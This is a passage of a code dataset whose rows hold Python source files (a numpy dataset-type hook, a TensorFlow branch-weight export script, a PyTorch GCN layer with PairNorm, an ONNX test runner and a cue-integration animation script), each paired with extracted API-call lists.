code
stringlengths 31
1.05M
| apis
list | extract_api
stringlengths 97
1.91M
|
---|---|---|
from typing import Tuple, Type
import numpy as np
from pyjackson.core import ArgList, Field
from pyjackson.generics import Serializer
from ebonite.core.analyzer.base import CanIsAMustHookMixin, TypeHookMixin
from ebonite.core.analyzer.dataset import DatasetHook
from ebonite.core.objects.dataset_type import DatasetType
from ebonite.runtime.interface.typing import ListTypeWithSpec, SizedTypedListType
def _python_type_from_np_string_repr(string_repr: str) -> type:
np_type = _np_type_from_string(string_repr)
return _python_type_from_np_type(np_type)
def _python_type_from_np_type(np_type: Type):
value = np_type()
if np_type.__module__ == 'numpy':
value = value.item()
return type(value)
def _np_type_from_string(string_repr):
try:
return getattr(np, string_repr)
except AttributeError:
raise ValueError('Unknown numpy type {}'.format(string_repr))
class NumpyNumberDatasetType(DatasetType):
"""
:class:`.DatasetType` implementation for `numpy.number` objects which
converts them to built-in Python numbers and vice versa.
:param dtype: `numpy.number` data type as string
"""
type = 'numpy_number'
def __init__(self, dtype: str):
self.dtype = dtype
def get_spec(self) -> ArgList:
return [Field(None, self.actual_type, False)]
def deserialize(self, obj: dict) -> object:
return self.actual_type(obj)
def serialize(self, instance: np.number) -> object:
return instance.item()
@property
def actual_type(self):
return _np_type_from_string(self.dtype)
class NumpyNumberHook(CanIsAMustHookMixin, DatasetHook):
"""
:class:`.DatasetHook` implementation for `numpy.number` objects which uses :class:`NumpyNumberDatasetType`.
"""
def must_process(self, obj) -> bool:
return isinstance(obj, np.number)
def process(self, obj: np.number) -> DatasetType:
return NumpyNumberDatasetType(obj.dtype.name)
class NumpyNdarrayHook(TypeHookMixin, DatasetHook):
"""
:class:`.DatasetHook` implementation for `np.ndarray` objects which uses :class:`NumpyNdarrayDatasetType`
"""
valid_types = [np.ndarray]
def process(self, obj) -> DatasetType:
return NumpyNdarrayDatasetType(obj.shape, obj.dtype.name)
class NumpyDTypeSerializer(Serializer):
"""
PyJackson :class:`.Serializer` for `numpy` data types: stores types in JSON as their names.
"""
def deserialize(self, obj: str):
return getattr(np, obj)
def serialize(self, instance) -> str:
return str(instance)
class NumpyNdarrayDatasetType(DatasetType, ListTypeWithSpec):
"""
:class:`.DatasetType` implementation for `np.ndarray` objects
which converts them to built-in Python lists and vice versa.
:param shape: shape of `numpy.ndarray` objects in dataset
:param dtype: data type of `numpy.ndarray` objects in dataset
"""
real_type = np.ndarray
type = 'numpy_ndarray'
def __init__(self, shape: Tuple[int, ...], dtype: str):
# TODO assert shape and dtypes len
self.shape = shape
self.dtype = dtype
@property
def size(self):
if len(self.shape) == 1:
return 1
else:
return self.shape[0] # TODO more dimensions
def list_size(self):
return self.shape[0]
def _get_subtype(self, shape):
if len(shape) == 0:
return _python_type_from_np_string_repr(self.dtype)
elif len(shape) == 1:
subtype = _python_type_from_np_string_repr(self.dtype)
else:
subtype = self._get_subtype(shape[1:])
return SizedTypedListType(shape[0], subtype)
def get_spec(self) -> ArgList:
return [Field(None, self._get_subtype(self.shape[1:]), False)]
def deserialize(self, obj):
return np.array(obj)
def serialize(self, instance: np.ndarray):
# if self.shape == 1:
# return [instance.tolist()] # TODO better shapes
return instance.tolist()
|
[
"numpy.array",
"pyjackson.core.Field",
"ebonite.runtime.interface.typing.SizedTypedListType"
] |
[((3677, 3714), 'ebonite.runtime.interface.typing.SizedTypedListType', 'SizedTypedListType', (['shape[0]', 'subtype'], {}), '(shape[0], subtype)\n', (3695, 3714), False, 'from ebonite.runtime.interface.typing import ListTypeWithSpec, SizedTypedListType\n'), ((3870, 3883), 'numpy.array', 'np.array', (['obj'], {}), '(obj)\n', (3878, 3883), True, 'import numpy as np\n'), ((1304, 1340), 'pyjackson.core.Field', 'Field', (['None', 'self.actual_type', '(False)'], {}), '(None, self.actual_type, False)\n', (1309, 1340), False, 'from pyjackson.core import ArgList, Field\n')]
|
# Copyright 2021 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
import argparse
import numpy as np
from python.input.MNIST_input_pipeline import MNIST
from python.input.cifar10_input_pipeline import Cifar10
from python.input.cifar100_input_pipeline import Cifar100
from python.input.smallNORB_input_pipeline import smallNORB
from python.models.BranchingMerging import SmallImageBranchingMerging
import tensorflow as tf
def go(data_dir, log_dir, output_file, input_pipeline, merge_strategy,
use_hvcs=True, hvc_type=1, hvc_dims=None, total_convolutions=None,
branches_after=None):
files = []
for dirname, _, filenames in os.walk(log_dir):
file = list(set([os.path.join(dirname,
os.path.splitext(fn)[0]) for fn in filenames]))
if len(file) > 0:
files.append(file[0])
if input_pipeline == 3:
in_pipe = Cifar10(data_dir, False, 0)
elif input_pipeline == 4:
in_pipe = Cifar100(data_dir, False, 0)
elif input_pipeline == 5:
in_pipe = smallNORB(data_dir, False, 48, 32)
else:
in_pipe = MNIST(data_dir, False, 1)
branch_weights = []
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
print("Building model...")
model = SmallImageBranchingMerging(in_pipe.get_class_count(),
in_pipe.get_image_size(), in_pipe.get_image_channels(),
merge_strategy, use_hvcs, hvc_type, hvc_dims,
total_convolutions, branches_after, False)
for weights_file in files:
print("Restoring weights file: {}".format(weights_file))
ckpt = tf.train.Checkpoint(
vars=model.get_all_savable_variables())
ckpt.restore(weights_file).expect_partial()
branch_weights.append(model.branch_weights.variable.numpy())
print("Saving final branch weights...")
# (False Positive)
# noinspection PyTypeChecker
np.savetxt(output_file, np.array(branch_weights), delimiter=',', fmt='%0f')
print("Finished.")
################################################################################
if __name__ == "__main__":
p = argparse.ArgumentParser()
p.add_argument("--data_dir", default=r"../../../../Datasets/smallNORB_data")
p.add_argument("--log_dir", default=r"../../logs/20210609135430")
p.add_argument("--output_file",
default=r"../../logs/20210609135430/final_branch_weights.txt")
p.add_argument("--input_pipeline", default=5, type=int)
p.add_argument("--merge_strategy", default=2, type=float)
p.add_argument("--use_hvcs", default=True, type=bool)
p.add_argument("--hvc_type", default=2, type=int)
p.add_argument("--hvc_dims", default=[96, 144, 192], type=int)
p.add_argument("--total_convolutions", default=11, type=int)
p.add_argument("--branches_after", default=[4, 7, 10])
a = p.parse_args()
go(data_dir=a.data_dir, log_dir=a.log_dir, output_file=a.output_file,
input_pipeline=a.input_pipeline, merge_strategy=a.merge_strategy,
use_hvcs=a.use_hvcs, hvc_type=a.hvc_type, hvc_dims=a.hvc_dims,
total_convolutions=a.total_convolutions, branches_after=a.branches_after)
|
[
"argparse.ArgumentParser",
"python.input.cifar100_input_pipeline.Cifar100",
"os.path.splitext",
"numpy.array",
"python.input.cifar10_input_pipeline.Cifar10",
"python.input.smallNORB_input_pipeline.smallNORB",
"tensorflow.distribute.MirroredStrategy",
"python.input.MNIST_input_pipeline.MNIST",
"os.walk"
] |
[((1302, 1318), 'os.walk', 'os.walk', (['log_dir'], {}), '(log_dir)\n', (1309, 1318), False, 'import os\n'), ((1817, 1849), 'tensorflow.distribute.MirroredStrategy', 'tf.distribute.MirroredStrategy', ([], {}), '()\n', (1847, 1849), True, 'import tensorflow as tf\n'), ((2845, 2870), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2868, 2870), False, 'import argparse\n'), ((1534, 1561), 'python.input.cifar10_input_pipeline.Cifar10', 'Cifar10', (['data_dir', '(False)', '(0)'], {}), '(data_dir, False, 0)\n', (1541, 1561), False, 'from python.input.cifar10_input_pipeline import Cifar10\n'), ((2652, 2676), 'numpy.array', 'np.array', (['branch_weights'], {}), '(branch_weights)\n', (2660, 2676), True, 'import numpy as np\n'), ((1610, 1638), 'python.input.cifar100_input_pipeline.Cifar100', 'Cifar100', (['data_dir', '(False)', '(0)'], {}), '(data_dir, False, 0)\n', (1618, 1638), False, 'from python.input.cifar100_input_pipeline import Cifar100\n'), ((1687, 1721), 'python.input.smallNORB_input_pipeline.smallNORB', 'smallNORB', (['data_dir', '(False)', '(48)', '(32)'], {}), '(data_dir, False, 48, 32)\n', (1696, 1721), False, 'from python.input.smallNORB_input_pipeline import smallNORB\n'), ((1750, 1775), 'python.input.MNIST_input_pipeline.MNIST', 'MNIST', (['data_dir', '(False)', '(1)'], {}), '(data_dir, False, 1)\n', (1755, 1775), False, 'from python.input.MNIST_input_pipeline import MNIST\n'), ((1379, 1399), 'os.path.splitext', 'os.path.splitext', (['fn'], {}), '(fn)\n', (1395, 1399), False, 'import os\n')]
|
import torch, math, copy
import scipy.sparse as sp
import numpy as np
from torch.nn.modules.module import Module
import torch.nn as nn
from torch.nn.parameter import Parameter
def normalize(adj, device='cpu'):
if isinstance(adj, torch.Tensor):
adj_ = adj.to(device)
elif isinstance(adj, sp.csr_matrix):
adj_ = torch.from_numpy(adj.toarray()).float().to(device)
elif isinstance(adj, np.ndarray):
adj_ = torch.from_numpy(adj).float().to(device)
else:
adj_ = adj.to(device)
adj_ = adj_ + torch.eye(adj_.shape[0]).to(device)
rowsum = adj_.sum(1)
degree_mat_inv_sqrt = torch.diag(torch.pow(rowsum, -0.5).flatten())
degree_mat_sqrt = torch.diag(torch.pow(rowsum, -0.5).flatten())
adj_normalized = torch.mm(torch.spmm(degree_mat_inv_sqrt, adj_), degree_mat_sqrt)
# return torch.from_numpy(adj_normalized).float().to(device_
return adj_normalized
def coo_to_csp(sp_coo):
num = sp_coo.shape[0]
row = sp_coo.row
col = sp_coo.col
sp_tensor = torch.sparse.FloatTensor(torch.LongTensor(np.stack([row, col])),
torch.tensor(sp_coo.data),
torch.Size([num, num]))
return sp_tensor
#def sp_diag(sp_tensor):
# sp_tensor = sp_tensor.to_dense()
# sp_array = sp_tensor.to('cpu').numpy()
# sp_diags = sp.diags(sp_array).tocoo()
# return coo_to_csp(sp_diags)
def sp_normalize(adj_def, device='cpu'):
"""
:param adj: scipy.sparse.coo_matrix
:param device: default as cpu
:return: normalized_adj:
"""
adj_ = sp.coo_matrix(adj_def)
adj_ = adj_ + sp.coo_matrix(sp.eye(adj_def.shape[0]), dtype=np.float32)
rowsum = np.array(adj_.sum(axis=1)).reshape(-1)
norm_unit = np.float_power(rowsum, -0.5).astype(np.float32)
degree_mat_inv_sqrt = sp.diags(norm_unit)
degree_mat_sqrt = copy.copy(degree_mat_inv_sqrt)
# degree_mat_sqrt = degree_mat_inv_sqrt.to_dense()
support = adj_.__matmul__(degree_mat_sqrt)
# support = coo_to_csp(support.tocoo())
# degree_mat_inv_sqrt = coo_to_csp(degree_mat_inv_sqrt.tocoo())
adj_normalized = degree_mat_inv_sqrt.__matmul__(support)
adj_normalized = coo_to_csp(adj_normalized.tocoo())
return adj_normalized, rowsum
# coo_adj = sp.coo_matrix(adj_normalized.to('cpu').numpy())
# return coo_to_csp(coo_adj).to(device), rowsum
class PairNorm(nn.Module):
def __init__(self, mode='PN', scale=1):
"""
mode:
'None' : No normalization
'PN' : Original version
'PN-SI' : Scale-Individually version
'PN-SCS' : Scale-and-Center-Simultaneously version
('SCS'-mode is not in the paper but we found it works well in practice,
especially for GCN and GAT.)
PairNorm is typically used after each graph convolution operation.
"""
assert mode in ['None', 'PN', 'PN-SI', 'PN-SCS']
super(PairNorm, self).__init__()
self.mode = mode
self.scale = scale
# Scale can be set based on origina data, and also the current feature lengths.
# We leave the experiments to future. A good pool we used for choosing scale:
# [0.1, 1, 10, 50, 100]
def forward(self, x):
if self.mode == 'None':
return x
col_mean = x.mean(dim=0)
if self.mode == 'PN':
x = x - col_mean
rownorm_mean = (1e-6 + x.pow(2).sum(dim=1).mean()).sqrt()
x = self.scale * x / rownorm_mean
if self.mode == 'PN-SI':
x = x - col_mean
rownorm_individual = (1e-6 + x.pow(2).sum(dim=1, keepdim=True)).sqrt()
x = self.scale * x / rownorm_individual
if self.mode == 'PN-SCS':
rownorm_individual = (1e-6 + x.pow(2).sum(dim=1, keepdim=True)).sqrt()
x = self.scale * x / rownorm_individual - col_mean
return x
class GraphConvolution(Module):
"""
Simple GCN layer, similar to https://arxiv.org/abs/1609.02907
"""
def __init__(self, in_features, out_features, bias=True, mode='None', act=lambda x: x):
super(GraphConvolution, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.FloatTensor(in_features, out_features))
self.pn = PairNorm(mode=mode)
self.act = act
if bias:
self.bias = Parameter(torch.FloatTensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.weight.size(1))
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
def forward(self, input, adj):
support = torch.mm(input, self.weight)
output = torch.mm(adj, support)
if self.bias is not None:
output = output + self.bias
return self.act(self.pn(output))
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
|
[
"scipy.sparse.eye",
"torch.eye",
"torch.FloatTensor",
"torch.pow",
"torch.from_numpy",
"torch.mm",
"torch.tensor",
"numpy.stack",
"scipy.sparse.coo_matrix",
"torch.spmm",
"scipy.sparse.diags",
"copy.copy",
"torch.Size",
"numpy.float_power"
] |
[((1654, 1676), 'scipy.sparse.coo_matrix', 'sp.coo_matrix', (['adj_def'], {}), '(adj_def)\n', (1667, 1676), True, 'import scipy.sparse as sp\n'), ((1899, 1918), 'scipy.sparse.diags', 'sp.diags', (['norm_unit'], {}), '(norm_unit)\n', (1907, 1918), True, 'import scipy.sparse as sp\n'), ((1942, 1972), 'copy.copy', 'copy.copy', (['degree_mat_inv_sqrt'], {}), '(degree_mat_inv_sqrt)\n', (1951, 1972), False, 'import torch, math, copy\n'), ((791, 828), 'torch.spmm', 'torch.spmm', (['degree_mat_inv_sqrt', 'adj_'], {}), '(degree_mat_inv_sqrt, adj_)\n', (801, 828), False, 'import torch, math, copy\n'), ((1164, 1189), 'torch.tensor', 'torch.tensor', (['sp_coo.data'], {}), '(sp_coo.data)\n', (1176, 1189), False, 'import torch, math, copy\n'), ((1233, 1255), 'torch.Size', 'torch.Size', (['[num, num]'], {}), '([num, num])\n', (1243, 1255), False, 'import torch, math, copy\n'), ((5022, 5050), 'torch.mm', 'torch.mm', (['input', 'self.weight'], {}), '(input, self.weight)\n', (5030, 5050), False, 'import torch, math, copy\n'), ((5069, 5091), 'torch.mm', 'torch.mm', (['adj', 'support'], {}), '(adj, support)\n', (5077, 5091), False, 'import torch, math, copy\n'), ((1099, 1119), 'numpy.stack', 'np.stack', (['[row, col]'], {}), '([row, col])\n', (1107, 1119), True, 'import numpy as np\n'), ((1710, 1734), 'scipy.sparse.eye', 'sp.eye', (['adj_def.shape[0]'], {}), '(adj_def.shape[0])\n', (1716, 1734), True, 'import scipy.sparse as sp\n'), ((1824, 1852), 'numpy.float_power', 'np.float_power', (['rowsum', '(-0.5)'], {}), '(rowsum, -0.5)\n', (1838, 1852), True, 'import numpy as np\n'), ((4451, 4495), 'torch.FloatTensor', 'torch.FloatTensor', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (4468, 4495), False, 'import torch, math, copy\n'), ((556, 580), 'torch.eye', 'torch.eye', (['adj_.shape[0]'], {}), '(adj_.shape[0])\n', (565, 580), False, 'import torch, math, copy\n'), ((656, 679), 'torch.pow', 'torch.pow', (['rowsum', '(-0.5)'], {}), '(rowsum, -0.5)\n', (665, 679), False, 'import torch, math, copy\n'), ((725, 748), 'torch.pow', 'torch.pow', (['rowsum', '(-0.5)'], {}), '(rowsum, -0.5)\n', (734, 748), False, 'import torch, math, copy\n'), ((4613, 4644), 'torch.FloatTensor', 'torch.FloatTensor', (['out_features'], {}), '(out_features)\n', (4630, 4644), False, 'import torch, math, copy\n'), ((454, 475), 'torch.from_numpy', 'torch.from_numpy', (['adj'], {}), '(adj)\n', (470, 475), False, 'import torch, math, copy\n')]
|
#*
#* Copyright (C) 2017-2019 Alibaba Group Holding Limited
#*
#* Licensed under the Apache License, Version 2.0 (the "License");
#* you may not use this file except in compliance with the License.
#* You may obtain a copy of the License at
#*
#* http://www.apache.org/licenses/LICENSE-2.0
#*
#* Unless required by applicable law or agreed to in writing, software
#* distributed under the License is distributed on an "AS IS" BASIS,
#* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#* See the License for the specific language governing permissions and
#* limitations under the License.
import numpy as np
import onnx
import os
import glob
import caffe2.python.onnx.backend
from caffe2.python import core, workspace
from onnx import numpy_helper
import os
fail_sum = 0
dir_path = os.path.dirname(os.path.realpath(__file__))
test_dir = glob.glob(os.path.join(dir_path, 'test_*'))
model_paths = glob.glob(os.path.join(os.path.join(dir_path, 'test_*'), '*.onnx'))
m_len = len(model_paths)
for k in range(m_len):
model = onnx.load(model_paths[k])
test_data_dir = os.path.join(test_dir[k], 'test_data_set_0')
# Load inputs
inputs = []
inputs_num = len(glob.glob(os.path.join(test_data_dir, 'input_*.pb')))
for i in range(inputs_num):
input_file = os.path.join(test_data_dir, 'input_{}.pb'.format(i))
tensor = onnx.TensorProto()
with open(input_file, 'rb') as f:
tensor.ParseFromString(f.read())
inputs.append(numpy_helper.to_array(tensor))
# Load reference outputs
ref_outputs = []
ref_outputs_num = len(glob.glob(os.path.join(test_data_dir, 'output_*.pb')))
for j in range(ref_outputs_num):
output_file = os.path.join(test_data_dir, 'output_{}.pb'.format(j))
tensor = onnx.TensorProto()
with open(output_file, 'rb') as f:
tensor.ParseFromString(f.read())
ref_outputs.append(numpy_helper.to_array(tensor))
# Run the model on the backend
try:
outputs = list(caffe2.python.onnx.backend.run_model(model, inputs))
except RuntimeError:
print("!!Error: Model execution of " + test_dir[k] + " failed.")
fail_sum = fail_sum + 1
continue
idx = 0
# Results verification with golden data.
for ref_o, o in zip(ref_outputs, outputs):
try:
np.testing.assert_almost_equal(ref_o, o, decimal=5, err_msg="Failed test: " + test_dir[k])
except AssertionError:
print("!!Error: Output " + str(idx) + " of test: " + test_dir[k] + " failed")
fail_sum = fail_sum + 1
idx = idx + 1
print("============Summary:=============")
print(str(m_len) + " tests in total.")
print(str(m_len - fail_sum) + " tests passed.")
print(str(fail_sum) + " tests failed.")
print("=================================")
|
[
"os.path.join",
"os.path.realpath",
"onnx.TensorProto",
"numpy.testing.assert_almost_equal",
"onnx.load",
"onnx.numpy_helper.to_array"
] |
[((831, 857), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (847, 857), False, 'import os\n'), ((880, 912), 'os.path.join', 'os.path.join', (['dir_path', '"""test_*"""'], {}), "(dir_path, 'test_*')\n", (892, 912), False, 'import os\n'), ((1054, 1079), 'onnx.load', 'onnx.load', (['model_paths[k]'], {}), '(model_paths[k])\n', (1063, 1079), False, 'import onnx\n'), ((1098, 1142), 'os.path.join', 'os.path.join', (['test_dir[k]', '"""test_data_set_0"""'], {}), "(test_dir[k], 'test_data_set_0')\n", (1110, 1142), False, 'import os\n'), ((951, 983), 'os.path.join', 'os.path.join', (['dir_path', '"""test_*"""'], {}), "(dir_path, 'test_*')\n", (963, 983), False, 'import os\n'), ((1364, 1382), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (1380, 1382), False, 'import onnx\n'), ((1767, 1785), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (1783, 1785), False, 'import onnx\n'), ((1203, 1244), 'os.path.join', 'os.path.join', (['test_data_dir', '"""input_*.pb"""'], {}), "(test_data_dir, 'input_*.pb')\n", (1215, 1244), False, 'import os\n'), ((1486, 1515), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['tensor'], {}), '(tensor)\n', (1507, 1515), False, 'from onnx import numpy_helper\n'), ((1598, 1640), 'os.path.join', 'os.path.join', (['test_data_dir', '"""output_*.pb"""'], {}), "(test_data_dir, 'output_*.pb')\n", (1610, 1640), False, 'import os\n'), ((1895, 1924), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['tensor'], {}), '(tensor)\n', (1916, 1924), False, 'from onnx import numpy_helper\n'), ((2301, 2395), 'numpy.testing.assert_almost_equal', 'np.testing.assert_almost_equal', (['ref_o', 'o'], {'decimal': '(5)', 'err_msg': "('Failed test: ' + test_dir[k])"}), "(ref_o, o, decimal=5, err_msg='Failed test: ' +\n test_dir[k])\n", (2331, 2395), True, 'import numpy as np\n')]
|
"""
animation.py
This script is used to procduce animations of population behaviour
over a range of changing conditions. For example, if we wanted to
see how a population would change as light was elevated and wind
kept constant, we could produce the animation and watch the
general trend. This was mostly useful for visualisation, less for
formal analysis.
The script first constructs a series of Treatments which will be
simulated. The simulations are then run, each simulation produces
a plot which is stored in a target directory. These frames can
then be stitched together using a suitable tool, such as ffmpeg.
Note: the script is written for changing light elevations but
it should be reasonably straightforward to modify it for changing
other variables.
"""
from util.deserialiser import Deserialiser
from util.integration_models import *
from util.treatment import Treatment
from util.models import ReliabilityModel
from world.light import Light
from world.wind import Wind
import definitions as defn
import matplotlib.pyplot as plt
from scipy.special import i0
import numpy as np
import os
import shutil
def main():
#
# Simulator - can be anything in the util/integration_models module
#
simulator = CMLE()
rel_model = ReliabilityModel()
#
# Set the target output directory
#
os.chdir("frames/BWS")
print(os.getcwd())
start = 30 # Start elevation in degrees
end = 90 # End elevation
increment = 1 # Adjustment increment in degrees
iterations = 15 # Number of simulations to run at each elevation
treatnent_n = 30 # Number of individuals per treatment
elevation = np.radians(start)
filenumber = 0
wind_speed = 2.5 # Wind speed for each trial (this is assumed to be constant)
# While elevation still in range
while elevation < np.radians(end):
#
# Create the requisite treatment
#
treatment = Treatment()
treatment.set_reliability_model(rel_model)
treatment.set_n(treatnent_n)
treatment.set_id("Elevation {:.01f} degrees".format(np.degrees(elevation)))
init_light = Light(elevation, np.radians(0), treatment)
init_wind = Wind(wind_speed, np.radians(0), treatment)
initial = [init_wind, init_light]
conf_light = Light(elevation, np.radians(0), treatment)
conf_wind = Wind(wind_speed, np.radians(120), treatment)
conflict = [conf_wind, conf_light]
treatment.set_initial_cues(initial)
treatment.set_conflict_cues(conflict)
#
# Simulate the current treatment for some number of iterations.
#
for n in range(iterations):
#
# The filename format string is set to produce regular filenames
# which can easily be stitched into a video using ffmpeg. This can
# be modified.
#
filename = "{:05d}.png".format(filenumber)
simulator.simulate_treatment(treatment)
#
# Plot production
#
changes = treatment.get_changes_in_bearing()
avg_r, avg_t = treatment.get_avg_change()
plt.tight_layout()
ax = plt.subplot(121, projection='polar')
ax.plot(changes, np.ones(len(changes)), 'bo', color='magenta', alpha=0.2)
ax.plot(avg_t, avg_r, 'ro', markeredgecolor='k', label="R={:.02f},T={:.01f}".format(avg_r, np.degrees(avg_t)))
ax.set_title(treatment.get_id())
ax.set_rlim(0,1.1)
ax.set_theta_zero_location("N")
ax.set_theta_direction(-1)
ax.legend(loc='lower left')
params = treatment.get_cue_distribution_parameters()
initial_dist_ax = plt.subplot(222)
initial_light = params["initial"][0]
initial_wind = params["initial"][1]
light_mu = initial_light[0]
wind_mu = initial_wind[0]
light_kappa = initial_light[1]
wind_kappa = initial_wind[1]
light_x = np.linspace(-np.pi, np.pi, num=100)
light_y = np.exp(light_kappa*np.cos(light_x - light_mu))/(2*np.pi*i0(light_kappa))
wind_x = np.linspace(-np.pi, np.pi, num=100)
wind_y = np.exp(wind_kappa*np.cos(wind_x - wind_mu))/(2*np.pi*i0(wind_kappa))
initial_dist_ax.plot(np.degrees(light_x), light_y,
color='green',
label="Light: kappa={:.02f}".format(light_kappa)
)
initial_dist_ax.plot(np.degrees(wind_x),
wind_y,
color='blue',
label="Wind: kappa={:.02f}".format(wind_kappa))
initial_dist_ax.set_ylim([0,1])
initial_dist_ax.legend()
initial_dist_ax.set_title("Initial cue probability density")
initial_dist_ax.set_ylabel("Probability density")
conflict_dist_ax = plt.subplot(224)
conflict_light = params["conflict"][0]
conflict_wind = params["conflict"][1]
light_mu = conflict_light[0]
wind_mu = conflict_wind[0]
light_kappa = conflict_light[1]
wind_kappa = conflict_wind[1]
light_x = np.linspace(-np.pi, np.pi, num=100)
light_y = np.exp(light_kappa*np.cos(light_x - light_mu))/(2*np.pi*i0(light_kappa))
wind_x = np.linspace(-np.pi, np.pi, num=100)
wind_y = np.exp(wind_kappa*np.cos(wind_x - wind_mu))/(2*np.pi*i0(wind_kappa))
conflict_dist_ax.plot(np.degrees(light_x), light_y,
color='green',
label="Light: kappa={:.02f}".format(light_kappa)
)
conflict_dist_ax.plot(np.degrees(wind_x),
wind_y, color='blue',
label="Wind: kappa={:.02f}".format(wind_kappa))
conflict_dist_ax.set_ylim([0,1])
conflict_dist_ax.set_xlim([-180,180])
conflict_dist_ax.set_title("Conflict cue probability distributions")
conflict_dist_ax.set_xlabel("Degrees")
conflict_dist_ax.set_ylabel("Probability density")
# Bin data into 360/nbins degree bins to plot the population mass
nbins = 72
ch_hist = np.histogram(np.degrees(changes), np.linspace(-180, 180, nbins + 1))[0]
ch_hist_norm = ch_hist / sum(ch_hist)
# Plot population response alongside the cue distributions
plt.bar(np.linspace(-180, 180, nbins),
ch_hist_norm, width=360/nbins,
color='magenta',edgecolor='k', alpha=0.5,
label='Population response')
conflict_dist_ax.legend()
plt.gcf().set_size_inches(16,10)
plt.savefig(filename)
plt.clf()
# Loop admin
filenumber+=1
elevation+=np.radians(increment)
if __name__ == '__main__':
main()
|
[
"numpy.radians",
"util.treatment.Treatment",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.gcf",
"matplotlib.pyplot.clf",
"os.getcwd",
"os.chdir",
"matplotlib.pyplot.subplot",
"numpy.linspace",
"scipy.special.i0",
"numpy.cos",
"matplotlib.pyplot.tight_layout",
"numpy.degrees",
"util.models.ReliabilityModel"
] |
[((1259, 1277), 'util.models.ReliabilityModel', 'ReliabilityModel', ([], {}), '()\n', (1275, 1277), False, 'from util.models import ReliabilityModel\n'), ((1333, 1355), 'os.chdir', 'os.chdir', (['"""frames/BWS"""'], {}), "('frames/BWS')\n", (1341, 1355), False, 'import os\n'), ((1651, 1668), 'numpy.radians', 'np.radians', (['start'], {}), '(start)\n', (1661, 1668), True, 'import numpy as np\n'), ((1366, 1377), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1375, 1377), False, 'import os\n'), ((1831, 1846), 'numpy.radians', 'np.radians', (['end'], {}), '(end)\n', (1841, 1846), True, 'import numpy as np\n'), ((1929, 1940), 'util.treatment.Treatment', 'Treatment', ([], {}), '()\n', (1938, 1940), False, 'from util.treatment import Treatment\n'), ((7032, 7053), 'numpy.radians', 'np.radians', (['increment'], {}), '(increment)\n', (7042, 7053), True, 'import numpy as np\n'), ((2152, 2165), 'numpy.radians', 'np.radians', (['(0)'], {}), '(0)\n', (2162, 2165), True, 'import numpy as np\n'), ((2215, 2228), 'numpy.radians', 'np.radians', (['(0)'], {}), '(0)\n', (2225, 2228), True, 'import numpy as np\n'), ((2322, 2335), 'numpy.radians', 'np.radians', (['(0)'], {}), '(0)\n', (2332, 2335), True, 'import numpy as np\n'), ((2385, 2400), 'numpy.radians', 'np.radians', (['(120)'], {}), '(120)\n', (2395, 2400), True, 'import numpy as np\n'), ((3177, 3195), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3193, 3195), True, 'import matplotlib.pyplot as plt\n'), ((3213, 3249), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(121)'], {'projection': '"""polar"""'}), "(121, projection='polar')\n", (3224, 3249), True, 'import matplotlib.pyplot as plt\n'), ((3754, 3770), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(222)'], {}), '(222)\n', (3765, 3770), True, 'import matplotlib.pyplot as plt\n'), ((4053, 4088), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (4064, 4088), True, 'import numpy as np\n'), ((4205, 4240), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (4216, 4240), True, 'import numpy as np\n'), ((5008, 5024), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(224)'], {}), '(224)\n', (5019, 5024), True, 'import matplotlib.pyplot as plt\n'), ((5315, 5350), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (5326, 5350), True, 'import numpy as np\n'), ((5467, 5502), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (5478, 5502), True, 'import numpy as np\n'), ((6917, 6938), 'matplotlib.pyplot.savefig', 'plt.savefig', (['filename'], {}), '(filename)\n', (6928, 6938), True, 'import matplotlib.pyplot as plt\n'), ((6951, 6960), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (6958, 6960), True, 'import matplotlib.pyplot as plt\n'), ((2089, 2110), 'numpy.degrees', 'np.degrees', (['elevation'], {}), '(elevation)\n', (2099, 2110), True, 'import numpy as np\n'), ((4364, 4383), 'numpy.degrees', 'np.degrees', (['light_x'], {}), '(light_x)\n', (4374, 4383), True, 'import numpy as np\n'), ((4571, 4589), 'numpy.degrees', 'np.degrees', (['wind_x'], {}), '(wind_x)\n', (4581, 4589), True, 'import numpy as np\n'), ((5628, 5647), 'numpy.degrees', 'np.degrees', (['light_x'], {}), '(light_x)\n', (5638, 5647), True, 'import numpy as np\n'), ((5839, 5857), 'numpy.degrees', 'np.degrees', (['wind_x'], 